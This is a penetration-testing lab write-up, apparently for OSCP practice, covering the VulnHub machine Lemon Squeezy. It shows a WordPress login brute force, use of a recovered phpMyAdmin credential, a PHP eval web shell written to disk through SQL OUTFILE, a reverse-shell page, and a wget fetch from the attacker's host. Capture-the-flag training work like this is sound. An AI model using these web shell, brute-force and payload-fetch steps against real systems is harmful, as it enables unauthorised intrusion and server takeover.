vulnhub-2-lemon - My-oscp-all-things

System IP ： 192.168.124.7 ### Summary **1- Overview** **2- Enumeration** 2.1- Nmap Scan 2.2- Web Site Discovery 2.3- Active Directory Enumeration **3- Privilege Escalation** 3.1- Post-Compromise Enumeration 3.2- New Account Enumeration 3.3- Post-Compromise Exploitation ## 1- Overview ```text 发现使用wordpress、phpadmin 使用wpscan 获得一个普通用户凭证登录后台发现一个cred pass,获得phpadmin的权限，进行select into outfile操作写马获取www-data shell, 通过定时计划获得root shell ``` ## 2- Port Enumeration** ### 2.1-Service Enumeration **The rustscan results are as follows:** ``` rustscan -a 192.168.124.7 -u 5000 -- -A ``` ``` 80 port open ``` ### 2.2-Web Server Enumeration #### gobuster ``` ``` results: ![[Pasted image 20220331213551.png]] ``` wpscan --enumerate up --url http://lemonsqueezy/wordpress ``` we can find some user ![[Pasted image 20220331214034.png]] ``` lemon orange ``` ``` wpscan --url http://lemonsqueezy/wordpress -U user.txt -P /usr/share/wordlists/rockyou.txt ``` we can success to login orange : ginger ![[Pasted image 20220331214351.png]] login it and we can find this cred? ![[Pasted image 20220331214824.png]] ``` http://lemonsqueezy/phpmyadmin n0t1n@w0rdl1st! ``` ![[Pasted image 20220331220513.png]] change it ``` $P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00 ->$P$BY9AWyM0QjsVp5Ed3iBx9VsbqEsiMR0 ``` ![[Pasted image 20220331220711.png]] ![[Pasted image 20220331220732.png]] ## 3-Establish a foothold ``` select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/html/wordpress/php' ``` ![[Pasted image 20220331221614.png]] ![[Pasted image 20220331221744.png]] upload a webshell and nc to connect it ,it's a stty shell ``` http://lemonsqueezy/wordpress/php-reverse-shell.php ``` ![[Pasted image 20220331222145.png]] ``` python -c "import pty;pty.spawn('/bin/bash')" ``` ## 4- Privilege Escalation user.txt : TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH ![[Pasted image 20220331222251.png]] ``` wget 192.168.124.8:8080/all.tar > /var/www/html/wordpress ``` ![[Pasted image 20220331223837.png]] ![[Pasted image 20220331223903.png]] ![[Pasted image 20220331224358.png]] ### 4.1- Post-Compromise Enumeration ### 4.2- New Account Enumeration ![[Pasted image 20220331224452.png]] ``` user.txt : TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH ```